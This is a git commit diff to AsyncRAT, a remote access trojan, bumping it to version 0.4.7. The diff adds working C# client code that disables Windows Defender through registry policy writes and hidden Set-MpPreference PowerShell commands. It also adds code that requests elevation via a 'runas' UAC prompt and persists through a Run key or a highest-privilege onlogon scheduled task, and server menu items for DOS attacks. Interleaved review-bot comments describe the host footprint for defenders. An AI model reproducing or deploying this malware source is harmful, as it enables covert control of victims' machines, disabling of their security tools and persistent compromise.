Added dos attack
Added disable windows defender
Added ask for uac prompt
Fix install privileges
NYAN CAT 2019-05-09 06:27:20 -07:00
parent 8663f03b6f
commit 73acd52efe
17 changed files with 387 additions and 42 deletions


@ -219,6 +219,8 @@
</ItemGroup>
<ItemGroup>
<Content Include="async_icon.ico" />
<None Include="Resources\uac.png" />
<None Include="Resources\disabled.png" />
<None Include="Resources\AsyncRAT-Sharp.exe.config" />
<None Include="Resources\ddos.png" />
<None Include="Resources\settings.png" />


@ -38,6 +38,7 @@
this.lv_os = ((System.Windows.Forms.ColumnHeader)(new System.Windows.Forms.ColumnHeader()));
this.lv_version = ((System.Windows.Forms.ColumnHeader)(new System.Windows.Forms.ColumnHeader()));
this.lv_prefor = ((System.Windows.Forms.ColumnHeader)(new System.Windows.Forms.ColumnHeader()));
this.lv_admin = ((System.Windows.Forms.ColumnHeader)(new System.Windows.Forms.ColumnHeader()));
this.contextMenuStrip1 = new System.Windows.Forms.ContextMenuStrip(this.components);
this.cLIENTOPTIONSToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
this.cLOSEToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
@ -51,15 +52,18 @@
this.sENDFILETOMEMORYToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
this.rEMOTEDESKTOPToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
this.kEYLOGGERToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
this.toolStripMenuItem1 = new System.Windows.Forms.ToolStripMenuItem();
this.fILEMANAGERToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
this.pROCESSMANAGERToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
this.dISABLESToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
this.wINDOWDSDEFENDERToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
this.bOTKILLERToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
this.uSBSPREADToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
this.gETADMINISTRATORPRIVILEGESToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
this.toolStripSeparator2 = new System.Windows.Forms.ToolStripSeparator();
this.bUILDERToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
this.toolStripSeparator3 = new System.Windows.Forms.ToolStripSeparator();
this.aBOUTToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
this.toolStripMenuItem1 = new System.Windows.Forms.ToolStripMenuItem();
this.statusStrip1 = new System.Windows.Forms.StatusStrip();
this.toolStripStatusLabel1 = new System.Windows.Forms.ToolStripStatusLabel();
this.ping = new System.Windows.Forms.Timer(this.components);
@ -103,7 +107,8 @@
this.lv_user,
this.lv_os,
this.lv_version,
this.lv_prefor});
this.lv_prefor,
this.lv_admin});
this.listView1.ContextMenuStrip = this.contextMenuStrip1;
this.listView1.Dock = System.Windows.Forms.DockStyle.Fill;
this.listView1.FullRowSelect = true;
@ -154,6 +159,11 @@
this.lv_prefor.Text = "PERFORMANCE";
this.lv_prefor.Width = 170;
//
// lv_admin
//
this.lv_admin.Text = "PRIVILEGES";
this.lv_admin.Width = 138;
//
// contextMenuStrip1
//
this.contextMenuStrip1.ImageScalingSize = new System.Drawing.Size(24, 24);
@ -169,14 +179,16 @@
this.toolStripMenuItem1,
this.fILEMANAGERToolStripMenuItem,
this.pROCESSMANAGERToolStripMenuItem,
this.dISABLESToolStripMenuItem,
this.bOTKILLERToolStripMenuItem,
this.uSBSPREADToolStripMenuItem,
this.gETADMINISTRATORPRIVILEGESToolStripMenuItem,
this.toolStripSeparator2,
this.bUILDERToolStripMenuItem,
this.toolStripSeparator3,
this.aBOUTToolStripMenuItem});
this.contextMenuStrip1.Name = "contextMenuStrip1";
this.contextMenuStrip1.Size = new System.Drawing.Size(283, 442);
this.contextMenuStrip1.Size = new System.Drawing.Size(283, 502);
//
// cLIENTOPTIONSToolStripMenuItem
//
@ -271,6 +283,14 @@
this.kEYLOGGERToolStripMenuItem.Text = "KEYLOGGER";
this.kEYLOGGERToolStripMenuItem.Click += new System.EventHandler(this.KEYLOGGERToolStripMenuItem_Click);
//
// toolStripMenuItem1
//
this.toolStripMenuItem1.Image = global::AsyncRAT_Sharp.Properties.Resources.ddos;
this.toolStripMenuItem1.Name = "toolStripMenuItem1";
this.toolStripMenuItem1.Size = new System.Drawing.Size(282, 30);
this.toolStripMenuItem1.Text = "DOS ATTACK";
this.toolStripMenuItem1.Click += new System.EventHandler(this.ToolStripMenuItem1_Click);
//
// fILEMANAGERToolStripMenuItem
//
this.fILEMANAGERToolStripMenuItem.Image = global::AsyncRAT_Sharp.Properties.Resources.filemanager;
@ -287,6 +307,22 @@
this.pROCESSMANAGERToolStripMenuItem.Text = "PROCESS MANAGER";
this.pROCESSMANAGERToolStripMenuItem.Click += new System.EventHandler(this.pROCESSMANAGERToolStripMenuItem_Click);
//
// dISABLESToolStripMenuItem
//
this.dISABLESToolStripMenuItem.DropDownItems.AddRange(new System.Windows.Forms.ToolStripItem[] {
this.wINDOWDSDEFENDERToolStripMenuItem});
this.dISABLESToolStripMenuItem.Image = global::AsyncRAT_Sharp.Properties.Resources.disabled;
this.dISABLESToolStripMenuItem.Name = "dISABLESToolStripMenuItem";
this.dISABLESToolStripMenuItem.Size = new System.Drawing.Size(282, 30);
this.dISABLESToolStripMenuItem.Text = "DISABLES";
//
// wINDOWDSDEFENDERToolStripMenuItem
//
this.wINDOWDSDEFENDERToolStripMenuItem.Name = "wINDOWDSDEFENDERToolStripMenuItem";
this.wINDOWDSDEFENDERToolStripMenuItem.Size = new System.Drawing.Size(289, 30);
this.wINDOWDSDEFENDERToolStripMenuItem.Text = "WINDOWDS DEFENDER";
this.wINDOWDSDEFENDERToolStripMenuItem.Click += new System.EventHandler(this.WINDOWDSDEFENDERToolStripMenuItem_Click);
//
// bOTKILLERToolStripMenuItem
//
this.bOTKILLERToolStripMenuItem.Image = global::AsyncRAT_Sharp.Properties.Resources.botkiller;
@ -303,6 +339,14 @@
this.uSBSPREADToolStripMenuItem.Text = "USB SPREAD";
this.uSBSPREADToolStripMenuItem.Click += new System.EventHandler(this.USBSPREADToolStripMenuItem_Click);
//
// gETADMINISTRATORPRIVILEGESToolStripMenuItem
//
this.gETADMINISTRATORPRIVILEGESToolStripMenuItem.Image = global::AsyncRAT_Sharp.Properties.Resources.uac;
this.gETADMINISTRATORPRIVILEGESToolStripMenuItem.Name = "gETADMINISTRATORPRIVILEGESToolStripMenuItem";
this.gETADMINISTRATORPRIVILEGESToolStripMenuItem.Size = new System.Drawing.Size(282, 30);
this.gETADMINISTRATORPRIVILEGESToolStripMenuItem.Text = "GET ADMIN PRIVILEGES";
this.gETADMINISTRATORPRIVILEGESToolStripMenuItem.Click += new System.EventHandler(this.GETADMINISTRATORPRIVILEGESToolStripMenuItem_Click);
//
// toolStripSeparator2
//
this.toolStripSeparator2.Name = "toolStripSeparator2";
@ -329,14 +373,6 @@
this.aBOUTToolStripMenuItem.Text = "ABOUT";
this.aBOUTToolStripMenuItem.Click += new System.EventHandler(this.ABOUTToolStripMenuItem_Click);
//
// toolStripMenuItem1
//
this.toolStripMenuItem1.Image = global::AsyncRAT_Sharp.Properties.Resources.ddos;
this.toolStripMenuItem1.Name = "toolStripMenuItem1";
this.toolStripMenuItem1.Size = new System.Drawing.Size(282, 30);
this.toolStripMenuItem1.Text = "DOS ATTACK";
this.toolStripMenuItem1.Click += new System.EventHandler(this.ToolStripMenuItem1_Click);
//
// statusStrip1
//
this.statusStrip1.ImageScalingSize = new System.Drawing.Size(24, 24);
@ -598,6 +634,10 @@
private System.Windows.Forms.ContextMenuStrip contextMenuStrip3;
private System.Windows.Forms.ToolStripMenuItem notificationOFFToolStripMenuItem;
private System.Windows.Forms.ToolStripMenuItem toolStripMenuItem1;
private System.Windows.Forms.ToolStripMenuItem dISABLESToolStripMenuItem;
private System.Windows.Forms.ToolStripMenuItem wINDOWDSDEFENDERToolStripMenuItem;
private System.Windows.Forms.ToolStripMenuItem gETADMINISTRATORPRIVILEGESToolStripMenuItem;
private System.Windows.Forms.ColumnHeader lv_admin;
}
}


@ -42,7 +42,7 @@ namespace AsyncRAT_Sharp
{
if (!File.Exists(Path.Combine(Application.StartupPath, Path.GetFileName(Application.ExecutablePath) + ".config")))
{
// File.WriteAllText(Path.Combine(Application.StartupPath, Path.GetFileName(Application.ExecutablePath) + ".config"), Properties.Resources.AsyncRAT_Sharp_exe);
// File.WriteAllText(Path.Combine(Application.StartupPath, Path.GetFileName(Application.ExecutablePath) + ".config"), Properties.Resources.AsyncRAT_Sharp_exe);
Process.Start(Application.ExecutablePath);
Environment.Exit(0);
}
@ -224,20 +224,24 @@ namespace AsyncRAT_Sharp
{
if (listView1.SelectedItems.Count > 0)
{
try
DialogResult dialogResult = MessageBox.Show(this, "Are you sure you want to unistall", "AsyncRAT | Unistall", MessageBoxButtons.YesNo, MessageBoxIcon.Information);
if (dialogResult == DialogResult.Yes)
{
MsgPack msgpack = new MsgPack();
msgpack.ForcePathObject("Packet").AsString = "uninstall";
foreach (ListViewItem itm in listView1.SelectedItems)
try
{
Clients client = (Clients)itm.Tag;
ThreadPool.QueueUserWorkItem(client.BeginSend, msgpack.Encode2Bytes());
MsgPack msgpack = new MsgPack();
msgpack.ForcePathObject("Packet").AsString = "uninstall";
foreach (ListViewItem itm in listView1.SelectedItems)
{
Clients client = (Clients)itm.Tag;
ThreadPool.QueueUserWorkItem(client.BeginSend, msgpack.Encode2Bytes());
}
}
catch (Exception ex)
{
MessageBox.Show(ex.Message);
return;
}
}
catch (Exception ex)
{
MessageBox.Show(ex.Message);
return;
}
}
}
@ -644,10 +648,68 @@ namespace AsyncRAT_Sharp
Properties.Settings.Default.Save();
}
private readonly FormDOS formDOS = new FormDOS();
private readonly FormDOS formDOS = new FormDOS();
private void ToolStripMenuItem1_Click(object sender, EventArgs e)
{
formDOS.Show();
}
private void WINDOWDSDEFENDERToolStripMenuItem_Click(object sender, EventArgs e)
{
if (listView1.SelectedItems.Count > 0)
{
DialogResult dialogResult = MessageBox.Show(this, "Administrator privileges are required!", "AsyncRAT | Disbale Defender", MessageBoxButtons.YesNo, MessageBoxIcon.Information);
if (dialogResult == DialogResult.Yes)
{
try
{
MsgPack msgpack = new MsgPack();
msgpack.ForcePathObject("Packet").AsString = "defender";
foreach (ListViewItem itm in listView1.SelectedItems)
{
if (itm.SubItems[lv_admin.Index].Text == "Administrator")
{
Clients client = (Clients)itm.Tag;
ThreadPool.QueueUserWorkItem(client.BeginSend, msgpack.Encode2Bytes());
}
}
}
catch (Exception ex)
{
MessageBox.Show(ex.Message);
return;
}
}
}
}
private void GETADMINISTRATORPRIVILEGESToolStripMenuItem_Click(object sender, EventArgs e)
{
if (listView1.SelectedItems.Count > 0)
{
DialogResult dialogResult = MessageBox.Show(this, "Popup UAC prompt? ", "AsyncRAT | Disbale Defender", MessageBoxButtons.YesNo, MessageBoxIcon.Information);
if (dialogResult == DialogResult.Yes)
{
try
{
MsgPack msgpack = new MsgPack();
msgpack.ForcePathObject("Packet").AsString = "uac";
foreach (ListViewItem itm in listView1.SelectedItems)
{
if (itm.SubItems[lv_admin.Index].Text != "Administrator")
{
Clients client = (Clients)itm.Tag;
ThreadPool.QueueUserWorkItem(client.BeginSend, msgpack.Encode2Bytes());
}
}
}
catch (Exception ex)
{
MessageBox.Show(ex.Message);
return;
}
}
}
}
}
}
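Review bot: The privilege filter in both new click handlers compares `itm.SubItems[lv_admin.Index].Text` with the literal `"Administrator"`, and nothing here says where that text comes from; elsewhere on this page it is the `Admin` string the client reports about itself. A comment such as `// lv_admin holds the client-reported "Admin" field; it is not verified server-side` would make clear that the column is a claim, not a measurement. The same comment can name the `Packet` values these handlers send (`"defender"`, `"uac"`), which are the strings an analyst would match against the client's dispatch switch. The class body starts outside this section.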


@ -31,6 +31,7 @@ namespace AsyncRAT_Sharp.Handle_Packet
client.LV.SubItems.Add(unpack_msgpack.ForcePathObject("OS").AsString);
client.LV.SubItems.Add(unpack_msgpack.ForcePathObject("Version").AsString);
client.LV.SubItems.Add(unpack_msgpack.ForcePathObject("Performance").AsString);
client.LV.SubItems.Add(unpack_msgpack.ForcePathObject("Admin").AsString);
client.LV.ToolTipText = unpack_msgpack.ForcePathObject("Path").AsString;
client.ID = unpack_msgpack.ForcePathObject("HWID").AsString;
Program.form1.listView1.Items.Add(client.LV);


@ -144,6 +144,16 @@ namespace AsyncRAT_Sharp.Properties {
}
}
/// <summary>
/// Looks up a localized resource of type System.Drawing.Bitmap.
/// </summary>
internal static System.Drawing.Bitmap disabled {
get {
object obj = ResourceManager.GetObject("disabled", resourceCulture);
return ((System.Drawing.Bitmap)(obj));
}
}
/// <summary>
/// Looks up a localized resource of type System.Drawing.Bitmap.
/// </summary>
@ -264,6 +274,16 @@ namespace AsyncRAT_Sharp.Properties {
}
}
/// <summary>
/// Looks up a localized resource of type System.Drawing.Bitmap.
/// </summary>
internal static System.Drawing.Bitmap uac {
get {
object obj = ResourceManager.GetObject("uac", resourceCulture);
return ((System.Drawing.Bitmap)(obj));
}
}
/// <summary>
/// Looks up a localized resource of type System.Drawing.Bitmap.
/// </summary>


@ -130,9 +130,18 @@
<data name="arrow_up" type="System.Resources.ResXFileRef, System.Windows.Forms">
<value>..\Resources\arrow_up.png;System.Drawing.Bitmap, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a</value>
</data>
<data name="ddos" type="System.Resources.ResXFileRef, System.Windows.Forms">
<value>..\Resources\ddos.png;System.Drawing.Bitmap, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a</value>
</data>
<data name="play-button" type="System.Resources.ResXFileRef, System.Windows.Forms">
<value>..\Resources\play-button.png;System.Drawing.Bitmap, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a</value>
</data>
<data name="disabled" type="System.Resources.ResXFileRef, System.Windows.Forms">
<value>..\Resources\disabled.png;System.Drawing.Bitmap, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a</value>
</data>
<data name="AsyncRAT_Sharp_exe" type="System.Resources.ResXFileRef, System.Windows.Forms">
<value>..\Resources\AsyncRAT-Sharp.exe.config;System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089;Windows-1252</value>
</data>
<data name="botkiller" type="System.Resources.ResXFileRef, System.Windows.Forms">
<value>..\Resources\botkiller.png;System.Drawing.Bitmap, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a</value>
</data>
@ -178,10 +187,7 @@
<data name="visit" type="System.Resources.ResXFileRef, System.Windows.Forms">
<value>..\Resources\visit.png;System.Drawing.Bitmap, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a</value>
</data>
<data name="ddos" type="System.Resources.ResXFileRef, System.Windows.Forms">
<value>..\Resources\ddos.png;System.Drawing.Bitmap, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a</value>
</data>
<data name="AsyncRAT_Sharp_exe" type="System.Resources.ResXFileRef, System.Windows.Forms">
<value>..\Resources\AsyncRAT-Sharp.exe.config;System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089;Windows-1252</value>
<data name="uac" type="System.Resources.ResXFileRef, System.Windows.Forms">
<value>..\Resources\uac.png;System.Drawing.Bitmap, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a</value>
</data>
</root>

Binary file not shown.

After

Width:  |  Height:  |  Size: 815 B

Binary file not shown.

After

Width:  |  Height:  |  Size: 1.8 KiB


@ -14,6 +14,6 @@ namespace AsyncRAT_Sharp
public static string Password { get; set; }
public static Aes256 AES{ get; set; }
public static readonly string Version = "AsyncRAT 0.4.6";
public static readonly string Version = "AsyncRAT 0.4.7";
}
}


@ -80,7 +80,9 @@
<Compile Include="Handle Packet\HandleDos.cs" />
<Compile Include="Handle Packet\HandleFileManager.cs" />
<Compile Include="Handle Packet\HandleGetScreenShot.cs" />
<Compile Include="Handle Packet\HandleUAC.cs" />
<Compile Include="Handle Packet\HandleUninstall.cs" />
<Compile Include="Handle Packet\HandleWindowsDefender.cs" />
<Compile Include="Handle Packet\Packet.cs" />
<Compile Include="Handle Packet\HandleLimeLogger.cs" />
<Compile Include="Handle Packet\HandleProcessManager.cs" />


@ -0,0 +1,36 @@
using Microsoft.Win32;
using System;
using System.Collections.Generic;
using System.Diagnostics;
using System.IO;
using System.Linq;
using System.Security.Principal;
using System.Text;
namespace Client.Handle_Packet
{
public class HandleUAC
{
public HandleUAC()
{
if (new WindowsPrincipal(WindowsIdentity.GetCurrent()).IsInRole(WindowsBuiltInRole.Administrator)) return;
try
{
Process proc = new Process
{
StartInfo = new ProcessStartInfo
{
FileName = Process.GetCurrentProcess().MainModule.FileName,
WindowStyle = ProcessWindowStyle.Hidden,
CreateNoWindow = true,
Verb = "runas"
}
};
proc.Start();
Environment.Exit(0);
}
catch { }
}
}
}
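Review bot: `HandleUAC` has no comment describing what it does to the host, and the empty `catch { }` hides the one outcome a reader most needs to know about. The constructor returns early when already elevated, otherwise starts `Process.GetCurrentProcess().MainModule.FileName` with `Verb = "runas"` and exits; if the start throws (presumably when the prompt is declined, which is not visible here), the exception is swallowed and the unelevated process carries on. A header comment such as `// Re-launches this executable via the "runas" verb; the user sees a consent prompt for the client binary` would document that the visible artifact is an elevation prompt for the program's own image followed by a process restart, which is what endpoint telemetry would record.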


@ -5,6 +5,7 @@ using System.Collections.Generic;
using System.Diagnostics;
using System.IO;
using System.Linq;
using System.Security.Principal;
using System.Text;
namespace Client.Handle_Packet
@ -17,9 +18,22 @@ namespace Client.Handle_Packet
{
try
{
Registry.CurrentUser.CreateSubKey(@"Software\Microsoft\Windows\CurrentVersion\Run\").DeleteValue(Path.GetFileName(Settings.ClientFullPath));
if (!new WindowsPrincipal(WindowsIdentity.GetCurrent()).IsInRole(WindowsBuiltInRole.Administrator))
Registry.CurrentUser.CreateSubKey(@"SOFTWARE\Microsoft\Windows\CurrentVersion\Run").DeleteValue(Path.GetFileName(Settings.ClientFullPath));
else
{
Process.Start(new ProcessStartInfo()
{
FileName = "schtasks",
Arguments = $"/delete /tn {Path.GetFileName(Settings.ClientFullPath)} /f",
CreateNoWindow = true,
ErrorDialog = false,
UseShellExecute = true,
WindowStyle = ProcessWindowStyle.Hidden
});
}
catch { }
}
catch { }
}
ProcessStartInfo Del = null;
try
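Review bot: The new elevated branch is uncommented, and nothing says that start-up registration now lives in one of two places depending on privilege; the same applies to the matching branch in the install hunk further down this page. Unelevated, the value named after `Path.GetFileName(Settings.ClientFullPath)` sits under the current user's `SOFTWARE\Microsoft\Windows\CurrentVersion\Run` key; elevated, it is a scheduled task of that same name handled through a hidden `schtasks` process (`/create /sc onlogon /rl highest` on install, `/delete ... /f` here). A short comment on each branch naming the location would tell anyone cleaning a host that both the Run key and the task list must be checked. The enclosing method starts and ends outside this hunk, and old and new lines are interleaved in this rendering, so the exact try/catch nesting cannot be confirmed from here.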


@ -0,0 +1,129 @@
using System;
using Microsoft.Win32;
using System.Diagnostics;
using System.Security.Principal;
// │ Author : NYAN CAT
// │ Name : Disable Windows Defender v1.0
// │ Contact : https://github.com/NYAN-x-CAT
// This program is distributed for educational purposes only.
namespace Client.Handle_Packet
{
public class HandleWindowsDefender
{
public HandleWindowsDefender()
{
if (!new WindowsPrincipal(WindowsIdentity.GetCurrent()).IsInRole(WindowsBuiltInRole.Administrator)) return;
RegistryEdit(@"SOFTWARE\Policies\Microsoft\Windows Defender", "DisableAntiSpyware", "1");
RegistryEdit(@"SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection", "DisableBehaviorMonitoring", "1");
RegistryEdit(@"SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection", "DisableOnAccessProtection", "1");
RegistryEdit(@"SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection", "DisableScanOnRealtimeEnable", "1");
RegistryEdit(@"SOFTWARE\Microsoft\Windows Defender\Features", "TamperProtection", "0"); //Windows 10 1903 Redstone 6
CheckDefender();
}
private static void RegistryEdit(string regPath, string name, string value)
{
try
{
using (RegistryKey key = Registry.LocalMachine.OpenSubKey(regPath, RegistryKeyPermissionCheck.ReadWriteSubTree))
{
if (key == null)
{
Registry.LocalMachine.CreateSubKey(regPath).SetValue(name, value, RegistryValueKind.DWord);
return;
}
if (key.GetValue(name) != (object)value)
key.SetValue(name, value, RegistryValueKind.DWord);
}
}
catch { }
}
private static void CheckDefender()
{
Process proc = new Process
{
StartInfo = new ProcessStartInfo
{
FileName = "powershell",
Arguments = "Get-MpPreference -verbose",
UseShellExecute = false,
RedirectStandardOutput = true,
WindowStyle = ProcessWindowStyle.Hidden,
CreateNoWindow = true
}
};
proc.Start();
while (!proc.StandardOutput.EndOfStream)
{
string line = proc.StandardOutput.ReadLine();
if (line.Contains(@"DisableRealtimeMonitoring") && line.Contains("False"))
RunPS("Set-MpPreference -DisableRealtimeMonitoring $true"); //real-time protection
else if (line.Contains(@"DisableBehaviorMonitoring") && line.Contains("False"))
RunPS("Set-MpPreference -DisableBehaviorMonitoring $true"); //behavior monitoring
else if (line.Contains(@"DisableBlockAtFirstSeen") && line.Contains("False"))
RunPS("Set-MpPreference -DisableBlockAtFirstSeen $true");
else if (line.Contains(@"DisableIOAVProtection") && line.Contains("False"))
RunPS("Set-MpPreference -DisableIOAVProtection $true"); //scans all downloaded files and attachments
else if (line.Contains(@"DisablePrivacyMode") && line.Contains("False"))
RunPS("Set-MpPreference -DisablePrivacyMode $true"); //displaying threat history
else if (line.Contains(@"SignatureDisableUpdateOnStartupWithoutEngine") && line.Contains("False"))
RunPS("Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true"); //definition updates on startup
else if (line.Contains(@"DisableArchiveScanning") && line.Contains("False"))
RunPS("Set-MpPreference -DisableArchiveScanning $true"); //scan archive files, such as .zip and .cab files
else if (line.Contains(@"DisableIntrusionPreventionSystem") && line.Contains("False"))
RunPS("Set-MpPreference -DisableIntrusionPreventionSystem $true"); // network protection
else if (line.Contains(@"DisableScriptScanning") && line.Contains("False"))
RunPS("Set-MpPreference -DisableScriptScanning $true"); //scanning of scripts during scans
else if (line.Contains(@"SubmitSamplesConsent") && !line.Contains("2"))
RunPS("Set-MpPreference -SubmitSamplesConsent 2"); //MAPSReporting
else if (line.Contains(@"MAPSReporting") && !line.Contains("0"))
RunPS("Set-MpPreference -MAPSReporting 0"); //MAPSReporting
else if (line.Contains(@"HighThreatDefaultAction") && !line.Contains("6"))
RunPS("Set-MpPreference -HighThreatDefaultAction 6 -Force"); // high level threat // Allow
else if (line.Contains(@"ModerateThreatDefaultAction") && !line.Contains("6"))
RunPS("Set-MpPreference -ModerateThreatDefaultAction 6"); // moderate level threat
else if (line.Contains(@"LowThreatDefaultAction") && !line.Contains("6"))
RunPS("Set-MpPreference -LowThreatDefaultAction 6"); // low level threat
else if (line.Contains(@"SevereThreatDefaultAction") && !line.Contains("6"))
RunPS("Set-MpPreference -SevereThreatDefaultAction 6"); // severe level threat
}
}
private static void RunPS(string args)
{
Process proc = new Process
{
StartInfo = new ProcessStartInfo
{
FileName = "powershell",
Arguments = args,
WindowStyle = ProcessWindowStyle.Hidden,
CreateNoWindow = true
}
};
proc.Start();
}
}
}
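Review bot: `HandleWindowsDefender` changes security settings in two different ways and no comment lists them, so the host footprint can only be recovered by reading every line of `RegistryEdit` and `CheckDefender`. A class-level comment should enumerate it: writes of `DisableAntiSpyware`, `DisableBehaviorMonitoring`, `DisableOnAccessProtection`, `DisableScanOnRealtimeEnable` and `TamperProtection` under `Registry.LocalMachine`, then hidden `powershell` children running `Get-MpPreference` and `Set-MpPreference`. Those are the events a responder would look for: policy-key writes from a non-management process, and `Set-MpPreference` command lines that disable protections or set a `*ThreatDefaultAction`. In `RegistryEdit`, `key.GetValue(name) != (object)value` compares references, so as written the value appears to be rewritten on every call, which the comment should also state. The trailing comments on the `SubmitSamplesConsent` and `MAPSReporting` lines both read `//MAPSReporting`; the first looks like a copy-paste.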


@ -25,35 +25,47 @@ namespace Client.Handle_Packet
case "sendMessage":
{
MessageBox.Show(unpack_msgpack.ForcePathObject("Message").AsString);
break;
}
break;
case "Ping":
{
Debug.WriteLine("Server Pinged me " + unpack_msgpack.ForcePathObject("Message").AsString);
break;
}
break;
case "thumbnails":
{
new HandleGetScreenShot();
break;
}
break;
case "sendFile":
{
Received();
new HandleSendTo().SendToDisk(unpack_msgpack);
break;
}
break;
case "sendMemory":
{
Received();
new HandleSendTo().SendToMemory(unpack_msgpack);
break;
}
case "defender":
{
new HandleWindowsDefender();
break;
}
case "uac":
{
new HandleUAC();
break;
}
break;
case "close":
{
@ -64,8 +76,8 @@ namespace Client.Handle_Packet
}
catch { }
Environment.Exit(0);
break;
}
break;
case "restart":
{
@ -77,14 +89,14 @@ namespace Client.Handle_Packet
catch { }
Process.Start(Application.ExecutablePath);
Environment.Exit(0);
break;
}
break;
case "uninstall":
{
new HandleUninstall();
break;
}
break;
case "usbSpread":
{


@ -3,6 +3,8 @@ using Microsoft.Win32;
using System;
using System.Diagnostics;
using System.IO;
using System.Security.Principal;
using System.Threading;
namespace Client.Install
{
@ -29,14 +31,31 @@ namespace Client.Install
FileStream fs;
if (File.Exists(Settings.ClientFullPath))
{
File.Delete(Settings.ClientFullPath);
Thread.Sleep(1000);
fs = new FileStream(Settings.ClientFullPath, FileMode.Create);
}
else
fs = new FileStream(Settings.ClientFullPath, FileMode.CreateNew);
byte[] clientExe = File.ReadAllBytes(Process.GetCurrentProcess().MainModule.FileName);
fs.Write(clientExe, 0, clientExe.Length);
fs.Dispose();
Registry.CurrentUser.CreateSubKey(@"Software\Microsoft\Windows\CurrentVersion\Run\").SetValue(Path.GetFileName(Settings.ClientFullPath), Settings.ClientFullPath);
if (!new WindowsPrincipal(WindowsIdentity.GetCurrent()).IsInRole(WindowsBuiltInRole.Administrator))
Registry.CurrentUser.CreateSubKey(@"SOFTWARE\Microsoft\Windows\CurrentVersion\Run").SetValue(Path.GetFileName(Settings.ClientFullPath), Settings.ClientFullPath);
else
{
Process.Start(new ProcessStartInfo()
{
FileName = "schtasks",
Arguments = $"/create /sc onlogon /rl highest /tn {Path.GetFileName(Settings.ClientFullPath)} /tr " + "\"" + Settings.ClientFullPath + "\"",
CreateNoWindow = true,
ErrorDialog = false,
UseShellExecute = true,
WindowStyle = ProcessWindowStyle.Hidden
});
}
Methods.CloseMutex();
Process.Start(Settings.ClientFullPath);
Environment.Exit(0);


@ -9,7 +9,7 @@ namespace Client
{
public static string Ports = "6606";
public static string Host = "127.0.0.1";
public static string Version = "AsyncRAT 0.4.6";
public static string Version = "AsyncRAT 0.4.7";
public static string Install = "false";
public static string ClientFullPath = Path.Combine(Environment.ExpandEnvironmentVariables("%AppData%"), "Payload.exe");
public static string Password = "NYAN CAT";


@ -8,6 +8,7 @@ using System.IO;
using System.Net.Sockets;
using System.Threading;
using System.Text;
using System.Security.Principal;
// │ Author : NYAN CAT
// │ Name : Nyan Socket v0.1
@ -80,6 +81,7 @@ namespace Client.Sockets
Environment.Is64BitOperatingSystem.ToString().Replace("True", "64bit").Replace("False", "32bit");
msgpack.ForcePathObject("Path").AsString = Process.GetCurrentProcess().MainModule.FileName;
msgpack.ForcePathObject("Version").AsString = Settings.Version;
msgpack.ForcePathObject("Admin").AsString = new WindowsPrincipal(WindowsIdentity.GetCurrent()).IsInRole(WindowsBuiltInRole.Administrator).ToString().ToLower().Replace("true", "Administrator").Replace("false","User");
TheCPUCounter.NextValue();
msgpack.ForcePathObject("Performance").AsString = $"CPU {(int)TheCPUCounter.NextValue()}% RAM {(int)TheMemCounter.NextValue()}%";
return msgpack.Encode2Bytes();